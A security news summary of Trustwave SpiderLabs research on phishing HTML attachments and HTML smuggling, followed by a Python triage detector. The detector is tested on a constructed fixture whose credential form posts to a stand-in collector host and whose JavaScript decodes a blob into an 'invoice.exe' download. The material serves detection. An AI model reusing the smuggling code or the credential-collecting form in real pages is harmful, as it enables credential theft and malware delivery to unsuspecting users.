Criminals increasingly turn to malicious HTML file attachments as phish hooks.
Malicious HTML file attachments.
Researchers at Trustwave SpiderLabs have observed a rise in malicious HTML attachments in phishing emails over the past month. Most of these attachments open a phishing page that impersonates a login portal to steal users’ credentials. The researchers note that some of these files will plug the user’s email address into the login field of the phishing page, to trick the user into thinking they had previously logged in:
“SpiderLabs noticed that recent phishing HTML files contained the hard-coded email addresses of the target user – this makes it more convincing to the victim. At the source level, adversaries would employ various levels of code obfuscation. JavaScript code is usually obfuscated with open-source tools like JavaScript Obfuscator. HTML files are not stand-alone though, as they pull an additional jQuery library, CSS and JavaScript code from various remote web servers for handling form objects and form actions.
“Hard-coding the email addresses helps trick the victim into believing they had previously signed on to the page, since they only need to enter their password. Overall, this tactic makes the email appear more legitimate.”
HTML smuggling.
Attackers are also using HTML smuggling to avoid being detected by email security filters:
“To evade email gateways, a technique called HTML smuggling is being utilized by adversaries to deliver a malware binary to a target user. This method employs HTML5 that could work offline by storing a binary in an immutable blob of data in the form of JavaScript code. When opened through a web browser, the data blob gets decoded into a file object. A download notification bar is then displayed to the user. With a combination of social engineering, it lures the target user to save the binary to the disk to open it.”
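The two traits described above (a login form pre-filled with the target's address, and a JavaScript blob that is decoded into a download) can be triaged from the attachment's source before it ever reaches a browser. The following is an added example written for this summary, not code from Trustwave SpiderLabs; the HTML fixture and its indicator patterns are constructed for illustration, and the "binary" is inert filler that only carries the PE "MZ" magic bytes.

```python
import base64
import re

# Constructed fixture (not from the article): a pre-filled login form, a remote
# jQuery dependency, and a base64 blob turned into a file download via JavaScript.
BLOB = base64.b64encode(b"MZ" + b"\x00" * 3000).decode()
SAMPLE_HTML = f"""<html><body>
<script src="https://cdn.example.invalid/jquery.min.js"></script>
<form action="https://collector.example.invalid/post.php" method="post">
<input type="email" name="login" value="victim@example.invalid">
<input type="password" name="pw">
</form>
<script>
var data = "{BLOB}";
var blob = new Blob([Uint8Array.from(atob(data), c => c.charCodeAt(0))]);
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.exe";
</script></body></html>"""

# Indicators drawn from the article: hard-coded email values, large encoded blobs
# beside the browser APIs that turn them into a download, and remote dependencies.
PREFILLED_EMAIL = re.compile(r'value\s*=\s*["\']([^"\'\s@]+@[^"\'\s]+)["\']', re.I)
LARGE_B64 = re.compile(r'["\']([A-Za-z0-9+/]{1024,}={0,2})["\']')
REMOTE_REF = re.compile(r'(?:src|href|action)\s*=\s*["\'](https?://[^"\']+)', re.I)
BLOB_APIS = ("new Blob(", "URL.createObjectURL(", "msSaveOrOpenBlob(", "atob(", ".download")

def triage_html(html: str) -> dict:
    """Return the phishing and smuggling indicators found in one HTML attachment."""
    findings = {}
    emails = PREFILLED_EMAIL.findall(html)
    if emails:
        findings["prefilled_emails"] = emails
    remote = REMOTE_REF.findall(html)
    if remote:
        findings["remote_resources"] = remote
    apis = [api for api in BLOB_APIS if api in html]
    blobs = []
    for m in LARGE_B64.finditer(html):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # not real base64, skip it
            continue
        # Record the decoded size and whether it looks like a Windows executable.
        blobs.append({"size": len(raw), "pe_header": raw[:2] == b"MZ"})
    if blobs and apis:  # a blob alone is not enough; it must be wired to a download
        findings["html_smuggling"] = {"blobs": blobs, "apis": apis}
    return findings
```

A mail gateway rule built on this would quarantine on the `html_smuggling` key and flag `prefilled_emails` for analyst review, since a legitimate login page rarely ships with the recipient's address baked in.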